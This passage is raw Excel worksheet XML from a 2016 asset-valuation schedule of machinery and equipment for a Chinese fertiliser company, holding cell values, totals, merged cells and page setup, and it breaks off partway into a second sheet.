      </c>
      <c r="G96" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H96" s="152">
        <v>1</v>
      </c>
      <c r="I96" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J96" s="161">
        <v>27555.56</v>
      </c>
      <c r="K96" s="160">
        <v>11440</v>
      </c>
      <c r="L96" s="154"/>
      <c r="M96" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="97" customHeight="1" spans="2:13">
      <c r="B97" s="148">
        <v>91</v>
      </c>
      <c r="C97" s="251" t="s">
        <v>2666</v>
      </c>
      <c r="D97" s="252" t="s">
        <v>2667</v>
      </c>
      <c r="E97" s="253" t="s">
        <v>2668</v>
      </c>
      <c r="F97" s="155"/>
      <c r="G97" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H97" s="152">
        <v>1</v>
      </c>
      <c r="I97" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J97" s="161">
        <v>20284.1</v>
      </c>
      <c r="K97" s="160">
        <v>8403.2</v>
      </c>
      <c r="L97" s="154"/>
      <c r="M97" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="98" customHeight="1" spans="2:13">
      <c r="B98" s="148">
        <v>92</v>
      </c>
      <c r="C98" s="251" t="s">
        <v>2669</v>
      </c>
      <c r="D98" s="252" t="s">
        <v>1463</v>
      </c>
      <c r="E98" s="253" t="s">
        <v>2670</v>
      </c>
      <c r="F98" s="155"/>
      <c r="G98" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H98" s="152">
        <v>1</v>
      </c>
      <c r="I98" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J98" s="161">
        <v>54174.76</v>
      </c>
      <c r="K98" s="160">
        <v>19908.8</v>
      </c>
      <c r="L98" s="154"/>
      <c r="M98" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="99" customHeight="1" spans="2:13">
      <c r="B99" s="148">
        <v>93</v>
      </c>
      <c r="C99" s="251" t="s">
        <v>2671</v>
      </c>
      <c r="D99" s="252" t="s">
        <v>2672</v>
      </c>
      <c r="E99" s="253" t="s">
        <v>2673</v>
      </c>
      <c r="F99" s="155"/>
      <c r="G99" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H99" s="152">
        <v>1</v>
      </c>
      <c r="I99" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J99" s="161">
        <v>6266.74</v>
      </c>
      <c r="K99" s="160">
        <v>2103.36</v>
      </c>
      <c r="L99" s="154"/>
      <c r="M99" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="100" customHeight="1" spans="2:13">
      <c r="B100" s="148">
        <v>94</v>
      </c>
      <c r="C100" s="251" t="s">
        <v>2674</v>
      </c>
      <c r="D100" s="252" t="s">
        <v>1522</v>
      </c>
      <c r="E100" s="154" t="s">
        <v>2675</v>
      </c>
      <c r="F100" s="155"/>
      <c r="G100" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H100" s="152">
        <v>1</v>
      </c>
      <c r="I100" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J100" s="161">
        <v>25000</v>
      </c>
      <c r="K100" s="160">
        <v>11600</v>
      </c>
      <c r="L100" s="154"/>
      <c r="M100" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="101" customHeight="1" spans="2:13">
      <c r="B101" s="148">
        <v>95</v>
      </c>
      <c r="C101" s="251" t="s">
        <v>2676</v>
      </c>
      <c r="D101" s="252" t="s">
        <v>2677</v>
      </c>
      <c r="E101" s="154"/>
      <c r="F101" s="155"/>
      <c r="G101" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H101" s="152">
        <v>1</v>
      </c>
      <c r="I101" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J101" s="161">
        <v>37988.03</v>
      </c>
      <c r="K101" s="160">
        <v>13947.2</v>
      </c>
      <c r="L101" s="154"/>
      <c r="M101" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="102" customHeight="1" spans="2:13">
      <c r="B102" s="148">
        <v>96</v>
      </c>
      <c r="C102" s="251" t="s">
        <v>2678</v>
      </c>
      <c r="D102" s="252" t="s">
        <v>2679</v>
      </c>
      <c r="E102" s="154"/>
      <c r="F102" s="155"/>
      <c r="G102" s="152" t="s">
        <v>466</v>
      </c>
      <c r="H102" s="152">
        <v>1</v>
      </c>
      <c r="I102" s="251" t="s">
        <v>2599</v>
      </c>
      <c r="J102" s="161">
        <v>16000</v>
      </c>
      <c r="K102" s="160">
        <v>4480</v>
      </c>
      <c r="L102" s="154"/>
      <c r="M102" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="103" customHeight="1" spans="2:13">
      <c r="B103" s="148">
        <v>97</v>
      </c>
      <c r="C103" s="251" t="s">
        <v>2680</v>
      </c>
      <c r="D103" s="252" t="s">
        <v>2517</v>
      </c>
      <c r="E103" s="253" t="s">
        <v>2681</v>
      </c>
      <c r="F103" s="155"/>
      <c r="G103" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H103" s="152">
        <v>1</v>
      </c>
      <c r="I103" s="251" t="s">
        <v>2682</v>
      </c>
      <c r="J103" s="161">
        <v>10269.23</v>
      </c>
      <c r="K103" s="160">
        <v>3427.2</v>
      </c>
      <c r="L103" s="154"/>
      <c r="M103" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="104" customHeight="1" spans="2:13">
      <c r="B104" s="148">
        <v>98</v>
      </c>
      <c r="C104" s="251" t="s">
        <v>2683</v>
      </c>
      <c r="D104" s="252" t="s">
        <v>2684</v>
      </c>
      <c r="E104" s="154"/>
      <c r="F104" s="155"/>
      <c r="G104" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H104" s="152">
        <v>1</v>
      </c>
      <c r="I104" s="251" t="s">
        <v>2682</v>
      </c>
      <c r="J104" s="161">
        <v>10607.69</v>
      </c>
      <c r="K104" s="160">
        <v>4748.8</v>
      </c>
      <c r="L104" s="154"/>
      <c r="M104" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="105" customHeight="1" spans="2:13">
      <c r="B105" s="148">
        <v>99</v>
      </c>
      <c r="C105" s="251" t="s">
        <v>2685</v>
      </c>
      <c r="D105" s="252" t="s">
        <v>2686</v>
      </c>
      <c r="E105" s="154"/>
      <c r="F105" s="155"/>
      <c r="G105" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H105" s="152">
        <v>1</v>
      </c>
      <c r="I105" s="251" t="s">
        <v>2682</v>
      </c>
      <c r="J105" s="161">
        <v>53806.75</v>
      </c>
      <c r="K105" s="160">
        <v>18076.8</v>
      </c>
      <c r="L105" s="154"/>
      <c r="M105" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="106" customHeight="1" spans="2:13">
      <c r="B106" s="148">
        <v>100</v>
      </c>
      <c r="C106" s="251" t="s">
        <v>2687</v>
      </c>
      <c r="D106" s="252" t="s">
        <v>2449</v>
      </c>
      <c r="E106" s="154"/>
      <c r="F106" s="155"/>
      <c r="G106" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H106" s="152">
        <v>1</v>
      </c>
      <c r="I106" s="251" t="s">
        <v>2682</v>
      </c>
      <c r="J106" s="161">
        <v>24638.46</v>
      </c>
      <c r="K106" s="160">
        <v>10233.6</v>
      </c>
      <c r="L106" s="154" t="s">
        <v>2497</v>
      </c>
      <c r="M106" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="107" customHeight="1" spans="2:13">
      <c r="B107" s="148">
        <v>101</v>
      </c>
      <c r="C107" s="251" t="s">
        <v>2688</v>
      </c>
      <c r="D107" s="252" t="s">
        <v>2689</v>
      </c>
      <c r="E107" s="253" t="s">
        <v>2464</v>
      </c>
      <c r="F107" s="155"/>
      <c r="G107" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H107" s="152">
        <v>1</v>
      </c>
      <c r="I107" s="251" t="s">
        <v>2682</v>
      </c>
      <c r="J107" s="161">
        <v>18461.54</v>
      </c>
      <c r="K107" s="160">
        <v>7654.4</v>
      </c>
      <c r="L107" s="154"/>
      <c r="M107" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="108" customHeight="1" spans="2:13">
      <c r="B108" s="148">
        <v>102</v>
      </c>
      <c r="C108" s="251" t="s">
        <v>2690</v>
      </c>
      <c r="D108" s="252" t="s">
        <v>2667</v>
      </c>
      <c r="E108" s="253" t="s">
        <v>2691</v>
      </c>
      <c r="F108" s="155"/>
      <c r="G108" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H108" s="152">
        <v>1</v>
      </c>
      <c r="I108" s="251" t="s">
        <v>2682</v>
      </c>
      <c r="J108" s="161">
        <v>7243.59</v>
      </c>
      <c r="K108" s="160">
        <v>2995.2</v>
      </c>
      <c r="L108" s="154"/>
      <c r="M108" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="109" customHeight="1" spans="2:13">
      <c r="B109" s="148">
        <v>103</v>
      </c>
      <c r="C109" s="251" t="s">
        <v>2692</v>
      </c>
      <c r="D109" s="252" t="s">
        <v>2693</v>
      </c>
      <c r="E109" s="154" t="s">
        <v>2694</v>
      </c>
      <c r="F109" s="155"/>
      <c r="G109" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H109" s="152">
        <v>1</v>
      </c>
      <c r="I109" s="251" t="s">
        <v>2682</v>
      </c>
      <c r="J109" s="161">
        <v>156490.22</v>
      </c>
      <c r="K109" s="160">
        <v>70067.2</v>
      </c>
      <c r="L109" s="154" t="s">
        <v>2695</v>
      </c>
      <c r="M109" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="110" customHeight="1" spans="2:13">
      <c r="B110" s="148">
        <v>104</v>
      </c>
      <c r="C110" s="249" t="s">
        <v>2696</v>
      </c>
      <c r="D110" s="250" t="s">
        <v>2697</v>
      </c>
      <c r="E110" s="154"/>
      <c r="F110" s="155"/>
      <c r="G110" s="152" t="s">
        <v>466</v>
      </c>
      <c r="H110" s="152">
        <v>1</v>
      </c>
      <c r="I110" s="251" t="s">
        <v>2682</v>
      </c>
      <c r="J110" s="161">
        <v>148976.5</v>
      </c>
      <c r="K110" s="160">
        <v>61942.4</v>
      </c>
      <c r="L110" s="154"/>
      <c r="M110" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="111" customHeight="1" spans="2:13">
      <c r="B111" s="148">
        <v>105</v>
      </c>
      <c r="C111" s="251" t="s">
        <v>2698</v>
      </c>
      <c r="D111" s="252" t="s">
        <v>2699</v>
      </c>
      <c r="E111" s="154" t="s">
        <v>2464</v>
      </c>
      <c r="F111" s="155"/>
      <c r="G111" s="152" t="s">
        <v>1697</v>
      </c>
      <c r="H111" s="152">
        <v>1</v>
      </c>
      <c r="I111" s="251" t="s">
        <v>2682</v>
      </c>
      <c r="J111" s="161">
        <v>153645.22</v>
      </c>
      <c r="K111" s="160">
        <v>63897.6</v>
      </c>
      <c r="L111" s="154"/>
      <c r="M111" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="112" customHeight="1" spans="2:13">
      <c r="B112" s="148">
        <v>106</v>
      </c>
      <c r="C112" s="251" t="s">
        <v>2700</v>
      </c>
      <c r="D112" s="252" t="s">
        <v>2504</v>
      </c>
      <c r="E112" s="154"/>
      <c r="F112" s="155"/>
      <c r="G112" s="152" t="s">
        <v>466</v>
      </c>
      <c r="H112" s="152">
        <v>1</v>
      </c>
      <c r="I112" s="251" t="s">
        <v>2682</v>
      </c>
      <c r="J112" s="161">
        <v>87467</v>
      </c>
      <c r="K112" s="160">
        <v>36358.4</v>
      </c>
      <c r="L112" s="154" t="s">
        <v>2623</v>
      </c>
      <c r="M112" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="113" customHeight="1" spans="2:13">
      <c r="B113" s="148">
        <v>107</v>
      </c>
      <c r="C113" s="251" t="s">
        <v>2701</v>
      </c>
      <c r="D113" s="252" t="s">
        <v>2702</v>
      </c>
      <c r="E113" s="154"/>
      <c r="F113" s="155"/>
      <c r="G113" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H113" s="152">
        <v>10</v>
      </c>
      <c r="I113" s="251" t="s">
        <v>2703</v>
      </c>
      <c r="J113" s="161">
        <v>18230.77</v>
      </c>
      <c r="K113" s="160">
        <v>7571.2</v>
      </c>
      <c r="L113" s="154" t="s">
        <v>2704</v>
      </c>
      <c r="M113" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="114" customHeight="1" spans="2:13">
      <c r="B114" s="148">
        <v>108</v>
      </c>
      <c r="C114" s="251" t="s">
        <v>2705</v>
      </c>
      <c r="D114" s="252" t="s">
        <v>2706</v>
      </c>
      <c r="E114" s="154"/>
      <c r="F114" s="155"/>
      <c r="G114" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H114" s="152">
        <v>1</v>
      </c>
      <c r="I114" s="251" t="s">
        <v>2703</v>
      </c>
      <c r="J114" s="161">
        <v>277544.01</v>
      </c>
      <c r="K114" s="160">
        <v>115440</v>
      </c>
      <c r="L114" s="154"/>
      <c r="M114" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="115" customHeight="1" spans="2:13">
      <c r="B115" s="148">
        <v>109</v>
      </c>
      <c r="C115" s="251" t="s">
        <v>2707</v>
      </c>
      <c r="D115" s="252" t="s">
        <v>2708</v>
      </c>
      <c r="E115" s="154"/>
      <c r="F115" s="155"/>
      <c r="G115" s="152" t="s">
        <v>466</v>
      </c>
      <c r="H115" s="152">
        <v>1</v>
      </c>
      <c r="I115" s="251" t="s">
        <v>1195</v>
      </c>
      <c r="J115" s="161">
        <v>72649.57</v>
      </c>
      <c r="K115" s="160">
        <v>30201.6</v>
      </c>
      <c r="L115" s="154"/>
      <c r="M115" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="116" customHeight="1" spans="2:13">
      <c r="B116" s="148">
        <v>110</v>
      </c>
      <c r="C116" s="251" t="s">
        <v>2709</v>
      </c>
      <c r="D116" s="252" t="s">
        <v>2710</v>
      </c>
      <c r="E116" s="154"/>
      <c r="F116" s="155"/>
      <c r="G116" s="152" t="s">
        <v>466</v>
      </c>
      <c r="H116" s="152">
        <v>1</v>
      </c>
      <c r="I116" s="251" t="s">
        <v>1195</v>
      </c>
      <c r="J116" s="161">
        <v>119658.12</v>
      </c>
      <c r="K116" s="160">
        <v>47840</v>
      </c>
      <c r="L116" s="154"/>
      <c r="M116" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="117" customHeight="1" spans="2:13">
      <c r="B117" s="148">
        <v>111</v>
      </c>
      <c r="C117" s="249" t="s">
        <v>2711</v>
      </c>
      <c r="D117" s="250" t="s">
        <v>2578</v>
      </c>
      <c r="E117" s="154"/>
      <c r="F117" s="155"/>
      <c r="G117" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H117" s="152">
        <v>18</v>
      </c>
      <c r="I117" s="251" t="s">
        <v>2712</v>
      </c>
      <c r="J117" s="161">
        <v>28615.38</v>
      </c>
      <c r="K117" s="160">
        <v>12812.8</v>
      </c>
      <c r="L117" s="154" t="s">
        <v>2713</v>
      </c>
      <c r="M117" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="118" customHeight="1" spans="2:13">
      <c r="B118" s="148">
        <v>112</v>
      </c>
      <c r="C118" s="251" t="s">
        <v>2714</v>
      </c>
      <c r="D118" s="252" t="s">
        <v>1463</v>
      </c>
      <c r="E118" s="253" t="s">
        <v>1470</v>
      </c>
      <c r="F118" s="155"/>
      <c r="G118" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H118" s="152">
        <v>1</v>
      </c>
      <c r="I118" s="251" t="s">
        <v>1475</v>
      </c>
      <c r="J118" s="161">
        <v>7948.72</v>
      </c>
      <c r="K118" s="160">
        <v>3286.4</v>
      </c>
      <c r="L118" s="154"/>
      <c r="M118" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="119" customHeight="1" spans="2:13">
      <c r="B119" s="148">
        <v>113</v>
      </c>
      <c r="C119" s="251" t="s">
        <v>2715</v>
      </c>
      <c r="D119" s="252" t="s">
        <v>331</v>
      </c>
      <c r="E119" s="253" t="s">
        <v>2716</v>
      </c>
      <c r="F119" s="155"/>
      <c r="G119" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H119" s="152">
        <v>1</v>
      </c>
      <c r="I119" s="251" t="s">
        <v>2717</v>
      </c>
      <c r="J119" s="161">
        <v>7264.96</v>
      </c>
      <c r="K119" s="160">
        <v>3456</v>
      </c>
      <c r="L119" s="154"/>
      <c r="M119" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="120" customHeight="1" spans="2:13">
      <c r="B120" s="148">
        <v>114</v>
      </c>
      <c r="C120" s="251" t="s">
        <v>2718</v>
      </c>
      <c r="D120" s="252" t="s">
        <v>2719</v>
      </c>
      <c r="E120" s="253" t="s">
        <v>2720</v>
      </c>
      <c r="F120" s="155"/>
      <c r="G120" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H120" s="152">
        <v>1</v>
      </c>
      <c r="I120" s="251" t="s">
        <v>462</v>
      </c>
      <c r="J120" s="161">
        <v>11111.11</v>
      </c>
      <c r="K120" s="160">
        <v>5808</v>
      </c>
      <c r="L120" s="154"/>
      <c r="M120" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="121" customHeight="1" spans="2:13">
      <c r="B121" s="148">
        <v>115</v>
      </c>
      <c r="C121" s="166"/>
      <c r="D121" s="149" t="s">
        <v>2721</v>
      </c>
      <c r="E121" s="167"/>
      <c r="F121" s="168"/>
      <c r="G121" s="148" t="s">
        <v>223</v>
      </c>
      <c r="H121" s="166">
        <v>1</v>
      </c>
      <c r="I121" s="166">
        <v>2008</v>
      </c>
      <c r="J121" s="168"/>
      <c r="K121" s="160">
        <v>2800</v>
      </c>
      <c r="L121" s="167"/>
      <c r="M121" s="249" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="122" customHeight="1" spans="2:13">
      <c r="B122" s="148">
        <v>116</v>
      </c>
      <c r="C122" s="166"/>
      <c r="D122" s="149" t="s">
        <v>2663</v>
      </c>
      <c r="E122" s="167"/>
      <c r="F122" s="168"/>
      <c r="G122" s="148" t="s">
        <v>223</v>
      </c>
      <c r="H122" s="166">
        <v>2</v>
      </c>
      <c r="I122" s="166">
        <v>2008</v>
      </c>
      <c r="J122" s="168"/>
      <c r="K122" s="160">
        <v>5600</v>
      </c>
      <c r="L122" s="167"/>
      <c r="M122" s="249" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="123" customHeight="1" spans="2:13">
      <c r="B123" s="169" t="s">
        <v>1360</v>
      </c>
      <c r="C123" s="170"/>
      <c r="D123" s="170"/>
      <c r="E123" s="171"/>
      <c r="F123" s="172"/>
      <c r="G123" s="173"/>
      <c r="H123" s="173">
        <v>495</v>
      </c>
      <c r="I123" s="173"/>
      <c r="J123" s="161">
        <f>SUM(J7:J122)</f>
        <v>13142328.09</v>
      </c>
      <c r="K123" s="174">
        <f>SUM(K7:K122)</f>
        <v>4979044.8</v>
      </c>
      <c r="L123" s="147"/>
      <c r="M123" s="173"/>
    </row>
  </sheetData>
  <mergeCells count="16">
    <mergeCell ref="B1:K1"/>
    <mergeCell ref="B3:C3"/>
    <mergeCell ref="D3:L3"/>
    <mergeCell ref="B123:E123"/>
    <mergeCell ref="B5:B6"/>
    <mergeCell ref="C5:C6"/>
    <mergeCell ref="D5:D6"/>
    <mergeCell ref="E5:E6"/>
    <mergeCell ref="F5:F6"/>
    <mergeCell ref="G5:G6"/>
    <mergeCell ref="H5:H6"/>
    <mergeCell ref="H83:H84"/>
    <mergeCell ref="I5:I6"/>
    <mergeCell ref="L5:L6"/>
    <mergeCell ref="L33:L34"/>
    <mergeCell ref="M5:M6"/>
  </mergeCells>
  <pageMargins left="0.719444444444444" right="0.659722222222222" top="1.93958333333333" bottom="0.85" header="1.08958333333333" footer="0.569444444444444"/>
  <pageSetup paperSize="9" scale="75" orientation="landscape" horizontalDpi="600"/>
  <headerFooter alignWithMargins="0" scaleWithDoc="0">
    <oddHeader>&amp;L&amp;10
被评估单位（或者产权持有单位）：晋煤冀州银海化肥有限责任公司&amp;C&amp;"黑体,常规"&amp;18固定资产—机器设备评估明细表&amp;"宋体,常规"&amp;12
&amp;10评估基准日：2016年10月31日&amp;R&amp;10
表4-6-4
金额单位：人民币元</oddHeader>
    <oddFooter>&amp;L&amp;10评估单位:衡水正财资产评估有限公司&amp;C&amp;10评估人员：于红兵 郑国建 吴洁 贾佳 王文祥 程艳菊</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1573"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="K7" sqref="K7:K544"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="14.5" defaultRowHeight="23.25" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="10.25" style="16" customWidth="1"/>
    <col min="2" max="2" width="5.25" style="16" customWidth="1"/>
    <col min="3" max="3" width="9.25" style="16" customWidth="1"/>
    <col min="4" max="4" width="23.75" style="9" customWidth="1"/>
    <col min="5" max="5" width="23.5" style="9" customWidth="1"/>
    <col min="6" max="6" width="8.25" style="9" customWidth="1"/>
    <col min="7" max="7" width="5.75" style="16" customWidth="1"/>
    <col min="8" max="8" width="5.625" style="90" customWidth="1"/>
    <col min="9" max="9" width="11.5" style="9" customWidth="1"/>
    <col min="10" max="10" width="16" style="9" customWidth="1"/>
    <col min="11" max="11" width="14.25" style="91" customWidth="1"/>
    <col min="12" max="12" width="39.125" style="20" customWidth="1"/>
    <col min="13" max="16384" width="14.5" style="16"/>
  </cols>
  <sheetData>
    <row r="1" customHeight="1" spans="1:12">
      <c r="A1" s="93"/>
      <c r="B1" s="3" t="s">
        <v>206</v>
      </c>
      <c r="C1" s="3"/>
      <c r="D1" s="3"/>
      <c r="E1" s="3"/>
      <c r="F1" s="3"/>
      <c r="G1" s="3"/>
      <c r="H1" s="3"/>
      <c r="I1" s="3"/>
      <c r="J1" s="3"/>
      <c r="K1" s="3"/>
      <c r="L1" s="1"/>
    </row>
    <row r="2" customHeight="1" spans="1:12">
      <c r="A2" s="93"/>
      <c r="B2" s="1"/>
      <c r="C2" s="2"/>
      <c r="D2" s="2"/>
      <c r="E2" s="2"/>
      <c r="F2" s="2"/>
      <c r="G2" s="1"/>
      <c r="H2" s="1"/>
      <c r="I2" s="1"/>
      <c r="J2" s="1"/>
      <c r="K2" s="1"/>
      <c r="L2" s="1"/>
    </row>
    <row r="3" customHeight="1" spans="1:12">
      <c r="A3" s="93"/>
      <c r="B3" s="4" t="s">
        <v>207</v>
      </c>
      <c r="C3" s="4"/>
      <c r="D3" s="5" t="s">
        <v>1361</v>
      </c>
      <c r="E3" s="5"/>
      <c r="F3" s="5"/>
      <c r="G3" s="5"/>
      <c r="H3" s="5"/>
      <c r="I3" s="5"/>
      <c r="J3" s="5"/>
      <c r="K3" s="5"/>
      <c r="L3" s="5"/>
    </row>
    <row r="4" customHeight="1" spans="1:12">
      <c r="A4" s="93"/>
      <c r="B4" s="93"/>
      <c r="C4" s="93"/>
      <c r="D4" s="93"/>
      <c r="E4" s="93"/>
      <c r="F4" s="93"/>
      <c r="G4" s="93"/>
      <c r="H4" s="93"/>
      <c r="I4" s="93"/>
      <c r="J4" s="93"/>
      <c r="K4" s="93"/>
      <c r="L4" s="93"/>
    </row>
    <row r="5" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A5" s="93"/>
      <c r="B5" s="31" t="s">
        <v>209</v>
      </c>
      <c r="C5" s="46" t="s">
        <v>2722</v>
      </c>
      <c r="D5" s="65" t="s">
        <v>211</v>
      </c>
      <c r="E5" s="65" t="s">
        <v>212</v>
      </c>
      <c r="F5" s="65" t="s">
        <v>213</v>
      </c>
      <c r="G5" s="31" t="s">
        <v>214</v>
      </c>
      <c r="H5" s="33" t="s">
        <v>215</v>
      </c>
      <c r="I5" s="65" t="s">
        <v>216</v>
      </c>
      <c r="J5" s="46" t="s">
        <v>217</v>
      </c>
      <c r="K5" s="46" t="s">
        <v>218</v>
      </c>
      <c r="L5" s="125" t="s">
        <v>219</v>
      </c>
    </row>
    <row r="6" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A6" s="93"/>
      <c r="B6" s="31"/>
      <c r="C6" s="48"/>
      <c r="D6" s="65"/>
      <c r="E6" s="65"/>
      <c r="F6" s="65"/>
      <c r="G6" s="31"/>
      <c r="H6" s="33"/>
      <c r="I6" s="65"/>
      <c r="J6" s="48"/>
      <c r="K6" s="48"/>
      <c r="L6" s="125"/>
    </row>
    <row r="7" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A7" s="93"/>
      <c r="B7" s="88">
        <v>1</v>
      </c>
      <c r="C7" s="237" t="s">
        <v>2723</v>
      </c>
      <c r="D7" s="238" t="s">
        <v>2724</v>
      </c>
      <c r="E7" s="238" t="s">
        <v>2725</v>
      </c>
      <c r="F7" s="9" t="s">
        <v>2726</v>
      </c>
      <c r="G7" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H7" s="11">
        <v>2</v>
      </c>
      <c r="I7" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J7" s="126">
        <v>207000</v>
      </c>
      <c r="K7" s="99">
        <v>26880</v>
      </c>
      <c r="L7" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="8" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A8" s="93"/>
      <c r="B8" s="88">
        <v>2</v>
      </c>
      <c r="C8" s="237" t="s">
        <v>2727</v>
      </c>
      <c r="D8" s="238" t="s">
        <v>2728</v>
      </c>
      <c r="E8" s="238" t="s">
        <v>2729</v>
      </c>
      <c r="F8" s="9" t="s">
        <v>2726</v>
      </c>
      <c r="G8" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H8" s="11">
        <v>3</v>
      </c>
      <c r="I8" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J8" s="126">
        <v>31000</v>
      </c>
      <c r="K8" s="99">
        <v>40320</v>
      </c>
      <c r="L8" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="9" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A9" s="93"/>
      <c r="B9" s="88">
        <v>3</v>
      </c>
      <c r="C9" s="237" t="s">
        <v>2730</v>
      </c>
      <c r="D9" s="238" t="s">
        <v>1324</v>
      </c>
      <c r="E9" s="238" t="s">
        <v>2731</v>
      </c>
      <c r="F9" s="9"/>
      <c r="G9" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H9" s="11">
        <v>1</v>
      </c>
      <c r="I9" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J9" s="126">
        <v>7300</v>
      </c>
      <c r="K9" s="99">
        <v>0</v>
      </c>
      <c r="L9" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="10" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A10" s="93"/>
      <c r="B10" s="88">
        <v>4</v>
      </c>
      <c r="C10" s="237" t="s">
        <v>2732</v>
      </c>
      <c r="D10" s="238" t="s">
        <v>2733</v>
      </c>
      <c r="E10" s="238" t="s">
        <v>2734</v>
      </c>
      <c r="F10" s="9"/>
      <c r="G10" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H10" s="11">
        <v>1</v>
      </c>
      <c r="I10" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J10" s="126">
        <v>6200</v>
      </c>
      <c r="K10" s="99">
        <v>0</v>
      </c>
      <c r="L10" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="11" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A11" s="93"/>
      <c r="B11" s="88">
        <v>5</v>
      </c>
      <c r="C11" s="237" t="s">
        <v>2735</v>
      </c>
      <c r="D11" s="238" t="s">
        <v>2736</v>
      </c>
      <c r="E11" s="238" t="s">
        <v>2737</v>
      </c>
      <c r="F11" s="9"/>
      <c r="G11" s="88" t="s">
        <v>507</v>
      </c>
      <c r="H11" s="11">
        <v>1</v>
      </c>
      <c r="I11" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J11" s="126">
        <v>32000</v>
      </c>
      <c r="K11" s="99">
        <v>5376</v>
      </c>
      <c r="L11" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="12" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A12" s="93"/>
      <c r="B12" s="88">
        <v>6</v>
      </c>
      <c r="C12" s="237" t="s">
        <v>2738</v>
      </c>
      <c r="D12" s="238" t="s">
        <v>2739</v>
      </c>
      <c r="E12" s="238" t="s">
        <v>2740</v>
      </c>
      <c r="F12" s="9"/>
      <c r="G12" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H12" s="11">
        <v>2</v>
      </c>
      <c r="I12" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J12" s="126">
        <v>154200</v>
      </c>
      <c r="K12" s="99">
        <v>9868.8</v>
      </c>
      <c r="L12" s="238" t="s">
        <v>2118</v>
      </c>
    </row>
    <row r="13" s="88" customFormat="1" customHeight="1" spans="1:12">
      <c r="A13" s="93"/>
      <c r="B13" s="88">
        <v>7</v>
      </c>
      <c r="C13" s="237" t="s">
        <v>2741</v>
      </c>
      <c r="D13" s="238" t="s">
        <v>2742</v>
      </c>
      <c r="E13" s="238" t="s">
        <v>2743</v>
      </c>
      <c r="F13" s="9"/>
      <c r="G13" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H13" s="11">
        <v>1</v>
      </c>
      <c r="I13" s="238" t="s">
        <v>229</v>
      </c>
      <c r="J13" s="126">
        <v>70000</v>
      </c>
      <c r="K13" s="99">
        <v>2800</v>
      </c>
      <c r="L13" s="238" t="s">
